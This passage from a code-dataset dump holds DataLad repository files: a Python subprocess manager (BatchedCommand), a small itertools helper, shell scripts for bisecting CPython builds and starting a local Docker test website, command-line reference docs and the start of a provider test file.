ImportError):\n # ImportError could be raised when the interpreter is shutting down.\n if os.fdopen is None or lgr.debug is None:\n # if we are late in the game and things already gc'ed in py3,\n # it is Ok\n return\n raise\n\n\n@auto_repr\nclass BatchedCommand(SafeDelCloseMixin):\n \"\"\"\n Container for a running subprocess. 
Supports communication with the\n subprocess via stdin and stdout.\n \"\"\"\n\n # Collection of active BatchedCommands as a mapping from object IDs to\n # instances\n _active_instances: WeakValueDictionary[int, BatchedCommand] = WeakValueDictionary()\n\n def __init__(self,\n cmd: Union[str, Tuple, List],\n path: Optional[str] = None,\n output_proc: Optional[Callable] = None,\n timeout: Optional[float] = None,\n exception_on_timeout: bool = False,\n ):\n\n command = cmd\n self.command: list = [command] if not isinstance(command, List) else command\n self.path: Optional[str] = path\n self.output_proc: Optional[Callable] = output_proc\n self.timeout: Optional[float] = timeout\n self.exception_on_timeout: bool = exception_on_timeout\n\n self.stderr_output = b\"\"\n self.runner: Optional[WitlessRunner] = None\n self.encoding = None\n self.wait_timed_out = None\n self.return_code: Optional[int] = None\n self._abandon_cache = None\n self.last_request: Optional[str] = None\n\n self._active = 0\n self._active_last = _now()\n self.clean_inactive()\n assert id(self) not in self._active_instances\n self._active_instances[id(self)] = self\n\n # pure declarations\n self.stdin_queue: Queue\n self.generator: _ResultGenerator\n\n @classmethod\n def clean_inactive(cls):\n from . import cfg\n max_batched = cfg.obtain(\"datalad.runtime.max-batched\")\n max_inactive_age = cfg.obtain(\"datalad.runtime.max-inactive-age\")\n if len(cls._active_instances) > max_batched:\n active_qty = 0\n inactive = []\n for c in cls._active_instances.values():\n if c._active:\n active_qty += 1\n else:\n inactive.append(c)\n inactive.sort(key=attrgetter(\"_active_last\"))\n to_close = len(cls._active_instances) - max_batched\n if to_close <= 0:\n return\n too_young = 0\n now = _now()\n for i, c in enumerate(inactive):\n if (now - c._active_last).total_seconds() <= max_inactive_age:\n too_young = len(inactive) - i\n break\n elif c._active:\n active_qty += 1\n else:\n c.close()\n cls._active_instances.pop(id(c), None)\n to_close -= 1\n if to_close <= 0:\n break\n if to_close > 0:\n lgr.debug(\n \"Too many BatchedCommands remaining after cleanup;\"\n \" %d active, %d went inactive recently\",\n active_qty,\n too_young,\n )\n\n def _initialize(self):\n\n lgr.debug(\"Starting new runner for %s\", repr(self))\n lgr.log(5, \"Command: %s\", self.command)\n\n self.stdin_queue = queue.Queue()\n self.stderr_output = b\"\"\n self.wait_timed_out = None\n self.return_code = None\n self.last_request = None\n\n self.runner = WitlessRunner(\n cwd=self.path,\n env=GitRunnerBase.get_git_environ_adjusted()\n )\n self.generator = self.runner.run(\n cmd=self.command,\n protocol=BatchedCommandProtocol,\n stdin=self.stdin_queue,\n cwd=self.path,\n # This mimics the behavior of the old implementation w.r.t\n # timeouts when waiting for the closing process\n timeout=self.timeout or 11.0,\n # Keyword arguments for the protocol\n batched_command=self,\n output_proc=self.output_proc,\n )\n self.encoding = self.generator.runner.protocol.encoding\n\n self._active_last = _now()\n\n def process_running(self) -> bool:\n if self.runner:\n if self.generator.runner.process is None:\n return False\n result = self.generator.runner.process.poll()\n if result is None:\n return True\n self.return_code = result\n self.runner = None\n if result != 0:\n raise BatchedCommandError(\n cmd=\" \".join(self.command),\n last_processed_request=self.last_request,\n msg=f\"{type(self).__name__}: exited with {result} after \"\n f\"request: {self.last_request}\",\n code=result\n ) from 
CommandError\n return False\n\n def __call__(self,\n cmds: Union[str, Tuple, List]):\n \"\"\"\n Send requests to the subprocess and return the responses. We expect one\n response per request. How the response is structured is determined by\n output_proc. If output_proc returns not-None, the responses is\n considered to be a response.\n\n If output_proc is not provided, we assume that a single response is\n a single line.\n\n If the subprocess does not exist yet it is started before the first\n command is sent.\n\n Parameters\n ----------\n cmds : str or tuple or list of (str or tuple)\n request for the subprocess\n\n Returns\n -------\n (return_type[self.output_proc] | str)\n | list[(return_type[self.output_proc] | str)]\n\n Responses received from process. Either a single element, or a list\n of elements, if `cmds` was a list.\n The type of the elements is `str`, if `self.output_proc` is `None`.\n If `self.output_proc` is not `None`, the result type of\n `self.output_proc` determines the type of the elements.\n \"\"\"\n self._active += 1\n requests = cmds\n\n input_multiple = isinstance(requests, list)\n if not input_multiple:\n requests = [requests]\n\n responses = []\n try:\n # This code assumes that each processing request is\n # a single line and leads to a response that triggers a\n # `send_result` in the protocol.\n for request in requests:\n while True:\n try:\n responses.append(self.process_request(request))\n self.last_request = request\n break\n except StopIteration:\n # The process finished executing, store the last return\n # code and restart the process.\n lgr.debug(\"%s: command exited\", self)\n self.return_code = self.generator.return_code\n self.runner = None\n\n except CommandError as command_error:\n # Convert CommandError into BatchedCommandError\n self.runner = None\n self.return_code = command_error.code\n raise BatchedCommandError(\n cmd=command_error.cmd,\n last_processed_request=self.last_request,\n msg=command_error.msg,\n code=command_error.code,\n stdout=command_error.stdout,\n stderr=command_error.stderr,\n cwd=command_error.cwd,\n **command_error.kwargs\n ) from command_error\n\n finally:\n self._active -= 1\n return responses if input_multiple else responses[0] if responses else None\n\n def process_request(self,\n request: Union[Tuple, str]) -> Any | None:\n\n self._active += 1\n try:\n\n if not self.process_running():\n self._initialize()\n\n # Remember request and send it to subprocess\n if not isinstance(request, str):\n request = ' '.join(request)\n self.stdin_queue.put((request + \"\\n\").encode())\n\n # Get the response from the generator. We only consider\n # data received on stdout as a response.\n if self.output_proc:\n # If we have an output procedure, let the output procedure\n # read stdout and decide about the nature of the response\n response = self.output_proc(ReadlineEmulator(self))\n else:\n # If there is no output procedure we assume that a response\n # is one line.\n response = self.get_one_line()\n if response is not None:\n response = response.rstrip()\n return response\n\n finally:\n self._active -= 1\n\n def proc1(self,\n single_command: str):\n \"\"\"\n Simulate the old interface. 
This method is used only once in\n AnnexRepo.get_metadata()\n \"\"\"\n self._active += 1\n try:\n assert isinstance(single_command, str)\n return self(single_command)\n finally:\n self._active -= 1\n\n def get_one_line(self) -> Optional[str]:\n \"\"\"\n Get a single stdout line from the generator.\n\n If timeout was specified, and exception_on_timeout is False,\n and if a timeout occurs, return None. Otherwise, return the\n string that was read from the generator.\n \"\"\"\n\n # Implementation remarks:\n # 1. We know that BatchedCommandProtocol only returns complete lines on\n # stdout, that makes this code simple.\n # 2. stderr is handled transparently within this method,\n # by adding all stderr-content to an internal buffer.\n while True:\n source, data = self.generator.send(None)\n if source == STDERR_FILENO:\n self.stderr_output += data\n elif source == STDOUT_FILENO:\n return data\n elif source == \"timeout\":\n # TODO: we should restart the subprocess on timeout, otherwise\n # we might end up with results from a previous instruction,\n # when handling multiple instructions at once. Until this is\n # done properly, communication timeouts are ignored in order\n # to avoid errors.\n if data is None:\n lgr.debug('BatchedCommand: timeout on process')\n else:\n lgr.debug('BatchedCommand: timeout on file descriptor %d', data)\n else:\n raise ValueError(f\"{self}: unknown source: {source}\")\n\n def close(self, return_stderr=False):\n \"\"\"\n Close communication and wait for process to terminate. If the \"timeout\"\n parameter to the constructor was not None, and if the configuration\n setting \"datalad.runtime.stalled-external\" is set to \"abandon\",\n the method will return latest after \"timeout\" seconds. If the subprocess\n did not exit within this time, the attribute \"wait_timed_out\" will\n be set to \"True\".\n\n Parameters\n ----------\n return_stderr: bool\n if set to \"True\", the call will return all collected stderr content\n as string. In addition, if return_stderr is True and the log level\n is 5 or lower, and the configuration setting \"datalad.log.outputs\"\n evaluates to \"True\", the content of stderr will be logged.\n\n Returns\n -------\n str, optional\n stderr output if return_stderr is True, None otherwise\n \"\"\"\n\n if self.runner:\n\n abandon = self._get_abandon()\n\n # Close stdin to let the process know that we want to end\n # communication. We also close stdout and stderr to inform\n # the generator that we do not care about them anymore. 
This\n # will trigger process wait timeouts.\n self.generator.runner.close_stdin()\n\n # Process all remaining messages until the subprocess exits.\n remaining = []\n timeout = False\n try:\n for source, data in self.generator:\n if source == STDERR_FILENO:\n self.stderr_output += data\n elif source == STDOUT_FILENO:\n remaining.append(data)\n elif source == \"timeout\":\n if data is None and abandon is True:\n timeout = True\n break\n else:\n raise ValueError(f\"{self}: unknown source: {source}\")\n self.return_code = self.generator.return_code\n\n except CommandError as command_error:\n lgr.error(\n \"%s subprocess exited with %s (%s)\",\n self,\n repr(command_error.code),\n command_error\n )\n self.return_code = command_error.code\n\n if remaining:\n lgr.debug(\"%s: remaining content: %s\", self, remaining)\n\n self.wait_timed_out = timeout is True\n if self.wait_timed_out:\n lgr.debug(\n \"%s: timeout while waiting for subprocess to exit\", self)\n lgr.warning(\n \"Batched process (%s) \"\n \"did not finish, abandoning it without killing it\",\n self.generator.runner.process.pid,\n )\n\n result = self.get_requested_error_output(return_stderr)\n self.runner = None\n self.stderr_output = b\"\"\n return result\n\n def get_requested_error_output(self, return_stderr: bool):\n if not self.runner:\n return None\n\n stderr_content = ensure_unicode(self.stderr_output)\n if lgr.isEnabledFor(5):\n from . import cfg\n if cfg.getbool(\"datalad.log\", \"outputs\", default=False):\n stderr_lines = stderr_content.splitlines()\n lgr.log(\n 5,\n \"stderr of %s had %d lines:\",\n self.generator.runner.process.pid if self.generator.runner.process else 'terminated',\n len(stderr_lines))\n for line in stderr_lines:\n lgr.log(5, \"| \" + line)\n if return_stderr:\n return stderr_content\n return None\n\n def get_timeout_exception(self,\n fd: Optional[int]\n ) -> Optional[TimeoutExpired]:\n \"\"\"\n Get a process timeout exception if timeout exceptions should\n be generated for a process that continues longer than timeout\n seconds after self.close() was initiated.\n \"\"\"\n if self.timeout is None \\\n or fd is not None \\\n or self.exception_on_timeout is False\\\n or self._get_abandon() == \"wait\":\n return None\n return TimeoutExpired(\n cmd=self.command,\n timeout=self.timeout or 11.0,\n stderr=self.stderr_output)\n\n def _get_abandon(self):\n if self._abandon_cache is None:\n if _cfg_val not in (\"wait\", \"abandon\"):\n raise ValueError(f\"Unexpected value: {_cfg_var}={_cfg_val!r}\")\n self._abandon_cache = _cfg_val == \"abandon\"\n return self._abandon_cache\n\n\ndef _now():\n return datetime.now().astimezone()\n" }, { "alpha_fraction": 0.5169230699539185, "alphanum_fraction": 0.5246154069900513, "avg_line_length": 33.21052551269531, "blob_id": "09dfcbac33d969f4781005f198a8fd05ed6c132e", "content_id": "56602d1db112618749ec2dee59bfa2668d95a279", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "permissive", "max_line_length": 87, "num_lines": 19, "path": "/datalad/support/itertools.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### 
### ### ### ### ### ### ### ### ##\n\"\"\"Auxiliary itertools\"\"\"\n\nimport itertools\n\n\ndef groupby_sorted(iter, key=None):\n \"\"\"A little helper which first sorts iterable by the same key\n\n Since groupby expects sorted entries\n \"\"\"\n yield from itertools.groupby(sorted(iter, key=key), key=key)\n" }, { "alpha_fraction": 0.6231736540794373, "alphanum_fraction": 0.6602106690406799, "avg_line_length": 34.03571319580078, "blob_id": "626da268f60c0df220cd593c9d304457604fb7ad", "content_id": "cc1e2fbb196bf2e35c8ca53881782b8ae12135d7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2943, "license_type": "permissive", "max_line_length": 221, "num_lines": 84, "path": "/tools/ci/bisect-python.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# Needed to be ran while in the cpython git source base\n# http://github.com/python/cpython\n# and it will create a directory with \"-builds\" suffix added,\n# and virtualenv under datalad's venvs/build-$ver created\n# unless another location is specified with VIRTUALENV_PATH\n# (remove it first if you want to reinit it).\n#\n# Bisection command and args could be provided, so overall e.g.\n# to find where fix was implemented:\n# (git)lena:~/proj/misc/cpython[tags/v3.8.0a1^0]git\n# $> git bisect start\n# $> git bisect new v3.8.0\n# $> git bisect old v3.8.0a1\n# Bisecting: 1017 revisions left to test after this (roughly 10 steps)\n# [3880f263d2994fb1eba25835dddccb0cf696fdf0] bpo-36933: Remove sys.set_coroutine_wrapper (marked for removal in 3.8) (GH-13577)\n# $> CP_COMMIT=cb083f7cdf604c1d9d264f387f9e8846bc953eb3 bisect run ~/proj/datalad/datalad-master/tools/ci/bisect-python.sh 'python3 ~/proj/datalad/datalad-master/datalad/support/tests/test_parallel.py && exit 1 || exit 0'\n# Actually above example was never tried, I did use helper manually,\n# but should work\nset -eu\nexport PS4='> '\n\n_cpython_src=$(pwd)\n_datalad_src=$(dirname \"$0\")\n_datalad_src=$(readlink -f \"${_datalad_src}/../..\")\n\necho \"Python source: $_cpython_src DataLad: $_datalad_src\"\nif [ ! -e \"${_cpython_src}/configure\" ] || [ ! -e \"${_datalad_src}/setup.py\" ]; then\n echo \"ERROR: no needed sources were found\" >&2\n exit 125\nfi\n_ver=$(git -C \"$_cpython_src\" describe)\nif [ ! -z \"${CP_COMMIT:-}\" ]; then\n _ver=\"${_ver}+${CP_COMMIT:0:6}\"\nfi\n_destdir=\"${_cpython_src}-builds/${_ver}\"\n_python=\"${_destdir}/usr/local/bin/python3\"\n\n_venv_d=\"${VIRTUALENV_PATH:-${_datalad_src}/venvs/build-${_ver}}\";\nredopip=\nif [ ! -e \"${_python}\" ]; then\n echo \"INFO: Building python\"\n redopip=1\n rm -rf \"${_venv_d}\" # old one would not be good anyways\n (\n cd \"${_cpython_src}\"\n chronic git clean -dfx\n if [ ! -z \"${CP_COMMIT:-}\" ]; then\n git cherry-pick \"${CP_COMMIT}\" || exit 125\n fi\n PATH=/usr/lib/ccache:$PATH chronic ./configure || exit 125\n PATH=/usr/lib/ccache:$PATH chronic make -j8 install DESTDIR=\"${_destdir}\" || exit 125\n )\nelse\n echo \"SKIP: $_python is already there, skipping building python\"\nfi\n\n# create virtualenv\nif [ ! -z \"$redopip\" ] || [ ! 
-e \"${_venv_d}\" ]; then\n echo \"INFO: Creating virtualenv\"\n chronic virtualenv --python=\"${_python}\" \"${_venv_d}\" || exit 125\n\n source \"${_venv_d}/bin/activate\"\n chronic pip3 install -e \"${_datalad_src}/.[devel]\" || exit 125\nelse\n source \"${_venv_d}/bin/activate\"\n echo \"SKIP: $_venv_d already there, skipping virtualenv + pip call\"\nfi\n\necho \"All ready:\nbuild: $_destdir\nvenv: ${_venv_d}\nsource: source \\\"${_venv_d}/bin/activate\\\"\npython: $(which python3)\nver: $(python3 --version)\ndatalad: $(git -C \"${_datalad_src}\" describe)\n\"\nif [ \"$#\" != 0 ]; then\n echo \"INFO: running bisection command $*\"\n bash -c \"$*\"\nelse\n echo \"INFO: no bisection command given\"\nfi\n" }, { "alpha_fraction": 0.6132075190544128, "alphanum_fraction": 0.6301403045654297, "avg_line_length": 34.033897399902344, "blob_id": "bc6de06af50c78e102f1c78f049d5bf8bb0b94e8", "content_id": "4054fae0a063dd535446fd787c667f6c08caf491", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4134, "license_type": "permissive", "max_line_length": 96, "num_lines": 118, "path": "/tools/testing/start_website_in_docker", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#emacs: -*- mode: shell-script; c-basic-offset: 4; tab-width: 4; indent-tabs-mode: t -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# Helper to generate a Docker instance mapping user uder docker into your USER/UID/GID\n# and allowing to run tox within that clean automatically generated according to\n# README.md's apt-get lines environment\n#\nset -e\nexport PS4=+\n#set -x\nset -u\n\nDL_DIST=${1:-jessie}\n\ntopdir=$(readlink -f `dirname $0`)\ncd `dirname $0`\ndockerfile=$topdir/start_website_in_docker-Dockerfile\n# echo \"D: $DL_APT\"\nsed -e \"s,DL_DIST,$DL_DIST,g\" \\\n -e \"s,DL_USER,$USER,g\" \\\n -e \"s,DL_UID,`id -u`,g\" \\\n -e \"s,DL_GID,`id -g`,g\" \\\n -e \"s,DL_GIT_USER_EMAIL,`git config --get user.email`,g\" \\\n -e \"s,DL_GIT_USER_NAME,`git config --get user.name`,g\" \\\n $dockerfile.in >| $dockerfile\n\n#DL_APT=$(grep '^\\(apt-get\\|pip\\)' ./../../README.md)\n\n{\n # grep '^apt-get ' $topdir/../../README.md | sed -e 's|python-{|python{,3}-{|g'; \\\n echo \"eatmydata apt-get install -q -y build-essential datalad python-pip python-virtualenv;\"\n echo \"eatmydata apt-get install -q -y libffi-dev libssl-dev python-dev;\"\n # Install dependencies and remove system wide datalad\n echo \"eatmydata dpkg --purge datalad python-datalad;\"\n} | while read aptline; do\n sed -i -e \"s|\\(\\(.*\\)DL_APT\\(.*\\)\\)|\\2$aptline\\3\\n\\1|g\" $dockerfile\n :\ndone\nsed -e '/DL_APT/d' -i $dockerfile\n\necho \"I: copy authorized keys so they become avail inside\"\ncp ~/.ssh/authorized_keys $topdir/conf/\n\ntag_=website_${USER}_${DL_DIST}\ntag=datalad:${tag_}\necho \"I: tag $tag\"\nif docker images | grep -q datalad.*${tag_}; then\n echo \"I: tag already exists -- skipping rebuilding\"\nelse\n docker build -t $tag -f $dockerfile . #&& rm Dockerfile\n #docker build --no-cache=True -t $tag -f $dockerfile . 
#&& rm Dockerfile\nfi\n\ntopgitdir=`readlink -f ${topdir}/../..`\necho \"I: top git dir $topgitdir\"\n\n#set -x\ndocker_id=`docker ps | awk \"/\\\\<$tag\\\\>/{print \\\\$1}\"`\necho \"D: looking for a docker with tag '$tag': $docker_id\"\nif [ -z \"$docker_id\" ]; then\n stopped_docker_id=`docker ps -a | awk \"/\\\\<$tag\\\\>/{print \\\\$1}\"`\n if [ -z \"$stopped_docker_id\" ]; then\n echo \"I: Starting new container with apache running\"\n docker_id=`docker run -d \\\n -v $topgitdir:/home/$USER/datalad \\\n -p 127.0.0.1:8081:80 \\\n -p 127.0.0.1:2221:22 \\\n $tag`\n echo \"Started container $docker_id\"\n\n # ATM pip freaks out with obnoxious message \n # of parse error at \"'__placeh'\". So we better upgrade pip while at it\n # see https://github.com/pypa/pip/issues/3659\n echo \"I: upgrading pip to avoid obnoxious problems\"\n docker exec $docker_id bash -c \"pip install -U pip --force-reinstall\"\n\n echo \"I: installing datalad inside (in development mode)\"\n # crap -- in sid image finishes with\n # Segmentation fault (core dumped)\n # yoh@8c3178bd7ea7:~/datalad$ echo $?\n # 139\n docker exec $docker_id bash -c \"cd datalad; pip install -e .\"\n else\n echo \"I: starting previous docker container $stopped_docker_id\"\n docker_id=`docker start $stopped_docker_id`\n echo \"Started container $docker_id\"\n fi\nelse\n echo \"Using running container $docker_id\"\nfi\n\ndocker_git_version=`docker exec $docker_id git --version 2>&1 | cut -d ' ' -f 3`\nif dpkg --compare-versions $docker_git_version lt 2.4; then\n echo \"I: too old of a git, let's symlink the one from git-annex-standalone\"\n for f in git git-receive-pack git-upload-pack; do\n docker exec $docker_id ln -sf /usr/lib/git-annex.linux/$f /usr/local/bin/$f\n done\nfi\n\ncat <<EOF\n-------------------------\nYou now should be able to upload to this host under ssh://localhost:2221:/var/www/html,\nwhich should then be made available under http://localhost:8081 .\nIt is recommended to create ~/.ssh/config entry\n\nHost dataladlocalhost\n Port 2221\n Hostname localhost\n StrictHostKeyChecking no\n\nEOF\n" }, { "alpha_fraction": 0.7420600652694702, "alphanum_fraction": 0.745064377784729, "avg_line_length": 38.49152374267578, "blob_id": "3f98bcf23f158a855638ae737fdb503f6dfe0cc5", "content_id": "3b9d3d12a3e07ee25ffe82ed16fe17771cfd25de", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2330, "license_type": "permissive", "max_line_length": 80, "num_lines": 59, "path": "/docs/source/design/application_vs_library_mode.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_application_vs_libary_mode:\n\n***************************************\nApplication-type vs. library-type usage\n***************************************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nHistorically, DataLad was implemented with the assumption of application-type\nusage, i.e., a person using DataLad through any of its APIs. Consequently,\n(error) messaging was primarily targeting humans, and usage advice focused on\ninteractive use. 
With the increasing utilization of DataLad as an\ninfrastructural component it was necessary to address use cases of library-type\nor internal usage more explicitly.\n\nDataLad continues to behave like a stand-alone application by default.\n\nFor internal use, Python and command-line APIs provide dedicated mode switches.\n\nLibrary mode can be enabled by setting the boolean configuration setting\n``datalad.runtime.librarymode`` **before the start of the DataLad process**.\nFrom the command line, this can be done with the option\n``-c datalad.runtime.librarymode=yes``, or any other means for setting\nconfiguration. In an already running Python process, library mode can be\nenabled by calling ``datalad.enable_libarymode()``. This should be done\nimmediately after importing the ``datalad`` package for maximum impact.\n\n.. code-block:: python\n\n >>> import datalad\n >>> datalad.enable_libarymode()\n\nIn a Python session, library mode **cannot** be enabled reliably by just setting\nthe configuration flag **after** the ``datalad`` package was already imported.\nThe ``enable_librarymode()`` function must be used.\n\nMoreover, with ``datalad.in_librarymode()`` a query utility is provided that\ncan be used throughout the code base for adjusting behavior according to the\nusage scenario.\n\nSwitching back and forth between modes during the runtime of a process is not\nsupported.\n\nA library mode setting is exported into the environment of the Python process.\nBy default, it will be inherited by all child-processes, such as dataset\nprocedure executions.\n\n\nLibrary-mode implications\n=========================\n\nNo Python API docs\n Generation of comprehensive doc-strings for all API commands is skipped. This\n speeds up ``import datalad.api`` by about 30%.\n" }, { "alpha_fraction": 0.7376264929771423, "alphanum_fraction": 0.7402023673057556, "avg_line_length": 43.18699264526367, "blob_id": "d7ef4b1496447e89676cfa5e56dd6b416d7f84a1", "content_id": "a915c3b0e027ea40771b79d51c5a808a3c3d4b3f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5435, "license_type": "permissive", "max_line_length": 143, "num_lines": 123, "path": "/docs/source/cmdline.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_cmdline:\n\n**********************\nCommand line reference\n**********************\n\nMain command\n============\n\n.. toctree::\n :maxdepth: 1\n\n datalad: Main command entrypoint <generated/man/datalad>\n\nCore commands\n=============\n\nA minimal set of commands that cover essential functionality. Core commands\nreceive special scrutiny with regard API composition and (breaking) changes.\n\nLocal operation\n---------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad create: Create a new dataset <generated/man/datalad-create>\n datalad save: Save the state of a dataset <generated/man/datalad-save>\n datalad run: Run a shell command and record its impact on a dataset <generated/man/datalad-run>\n datalad status: Report on the state of dataset content <generated/man/datalad-status>\n datalad diff: Report differences between two states of a dataset <generated/man/datalad-diff>\n\nDistributed operation\n---------------------\n\n.. 
toctree::\n :maxdepth: 1\n\n datalad clone: Obtain a dataset (sibling) from another location <generated/man/datalad-clone>\n datalad push: Push updates/data to a dataset sibling <generated/man/datalad-push>\n\n\nExtended set of functionality\n=============================\n\nDataset operations\n------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad add-readme: Add information on DataLad dataset to a README <generated/man/datalad-add-readme>\n datalad addurls: Update dataset content from a list of URLs <generated/man/datalad-addurls>\n datalad copy-file: Copy file identity and availability from one dataset to another <generated/man/datalad-copy-file>\n datalad drop: Drop datasets or dataset components <generated/man/datalad-drop>\n datalad get: Obtain any dataset content <generated/man/datalad-get>\n datalad install: Install a dataset from a (remote) source <generated/man/datalad-install>\n datalad no-annex: Configure a dataset to never put file content into an annex <generated/man/datalad-no-annex>\n datalad remove: Unlink components from a dataset <generated/man/datalad-remove>\n datalad subdatasets: Query and manipulate subdataset records of a dataset <generated/man/datalad-subdatasets>\n datalad unlock: Make dataset file content editable <generated/man/datalad-unlock>\n\n\nDataset siblings and 3rd-party platform support\n-----------------------------------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad siblings: Query and manipulate sibling configuration of a dataset <generated/man/datalad-siblings>\n datalad create-sibling: Create a sibling on an SSH-accessible machine <generated/man/datalad-create-sibling>\n datalad create-sibling-github: Create a sibling on GitHub <generated/man/datalad-create-sibling-github>\n datalad create-sibling-gitlab: Create a sibling on GitLab <generated/man/datalad-create-sibling-gitlab>\n datalad create-sibling-gogs: Create a sibling on GOGS <generated/man/datalad-create-sibling-gogs>\n datalad create-sibling-gitea: Create a sibling on Gitea <generated/man/datalad-create-sibling-gitea>\n datalad create-sibling-gin: Create a sibling on GIN (with content hosting) <generated/man/datalad-create-sibling-gin>\n datalad create-sibling-ria: Create a sibling in a RIA store <generated/man/datalad-create-sibling-ria>\n datalad export-archive: Export dataset content as a TAR/ZIP archive <generated/man/datalad-export-archive>\n datalad export-archive-ora: Export a local dataset annex for the ORA remote <generated/man/datalad-export-archive-ora>\n datalad export-to-figshare: Export dataset content as a ZIP archive to figshare <generated/man/datalad-export-to-figshare>\n datalad update: Obtain and incorporate updates from dataset siblings <generated/man/datalad-update>\n\n\nReproducible execution\n----------------------\n\nExtending the functionality of the core ``run`` command.\n\n.. toctree::\n :maxdepth: 1\n\n datalad rerun: Re-execute previous datalad-run commands <generated/man/datalad-rerun>\n datalad run-procedure: Run prepared procedures (DataLad scripts) on a dataset <generated/man/datalad-run-procedure>\n\n\nHelpers and support utilities\n-----------------------------\n\n.. 
toctree::\n :maxdepth: 1\n\n datalad add-archive-content: Extract and add the content of an archive to a dataset <generated/man/datalad-add-archive-content>\n datalad clean: Remove temporary left-overs of DataLad operations <generated/man/datalad-clean>\n datalad check-dates: Scan a dataset for dates and timestamps <generated/man/datalad-check-dates>\n datalad configuration: Get and set configuration <generated/man/datalad-configuration>\n datalad create-test-dataset: Test helper <generated/man/datalad-create-test-dataset>\n datalad download-url: Download helper with support for DataLad's credential system <generated/man/datalad-download-url>\n datalad foreach-dataset: Run a command or Python code on the dataset and/or each of its sub-datasets <generated/man/datalad-foreach-dataset>\n datalad sshrun: Remote command execution using DataLad's connection management <generated/man/datalad-sshrun>\n datalad shell-completion: Helper to support command completion <generated/man/datalad-shell-completion>\n datalad wtf: Report on a DataLad installation and its configuration <generated/man/datalad-wtf>\n\n\nDeprecated commands\n-------------------\n\n.. toctree::\n :maxdepth: 1\n\n datalad uninstall: Drop subdatasets <generated/man/datalad-uninstall>\n" }, { "alpha_fraction": 0.6277466416358948, "alphanum_fraction": 0.6302240490913391, "avg_line_length": 34.70769119262695, "blob_id": "f82ea9aba765eafbde5f21a76990ebad6a30a0d8", "content_id": "36f8a692fcad6898382f021182364ed64d303220", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9284, "license_type": "permissive", "max_line_length": 107, "num_lines": 260, "path": "/datalad/downloaders/tests/test_providers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for data providers\"\"\"\n\nimport logging\nimport os.path as op\nfrom unittest.mock import patch\n\nfrom ...support.external_versions import external_versions\nfrom ...tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_greater,\n assert_in,\n assert_raises,\n ok_exists,\n swallow_logs,\n with_tempfile,\n with_testsui,\n with_tree,\n)\nfrom ...utils import (\n chpwd,\n create_tree,\n)\nfrom ..providers import (\n HTTPDownloader,\n Provider,\n Providers,\n)\n\n\ndef test_Providers_OnStockConfiguration():\n providers = Providers.from_config_files()\n provider_names = {p.name for p in providers}\n assert_in('datalad-test-s3', provider_names)\n assert_in('crcns', provider_names)\n assert_greater(len(provider_names), 5)\n # too rigid\n #eq_(provider_names, {'crcns', 'crcns-nersc', 'hcp-http', 'hcp-s3', 'hcp-web', 'hcp-xnat', 'openfmri'})\n\n # every provider must have url_res\n for provider in providers:\n assert(provider.url_res)\n\n # and then that we didn't screw it up -- cycle few times to verify that we do not\n # somehow remove existing providers while dealing with that \"heaplike\" list\n for i in range(3):\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'crcns')\n\n provider = 
providers.get_provider('https://portal.nersc.gov/project/crcns/download/bogus')\n assert_equal(provider.name, 'crcns-nersc')\n\n assert_equal(providers.needs_authentication('http://google.com'), None)\n assert_equal(providers.needs_authentication('http://crcns.org/'), True)\n assert_equal(providers.needs_authentication('http://openfmri.org/'), False)\n\n providers_repr = repr(providers)\n # should list all the providers atm\n assert_equal(providers_repr.count('Provider('), len(providers))\n\n # Should be a lazy evaluator unless reload is specified\n assert(providers is Providers.from_config_files())\n assert(providers is not Providers.from_config_files(reload=True))\n\n\ndef test_Providers_default_ones():\n providers = Providers() # empty one\n\n # should return default one\n http_provider = providers.get_provider(\"http://example.com\")\n # which must be the same if asked for another one of http\n http_provider2 = providers.get_provider(\"http://datalad.org\")\n assert(http_provider is http_provider2)\n\n # but for another protocol, we would generate a 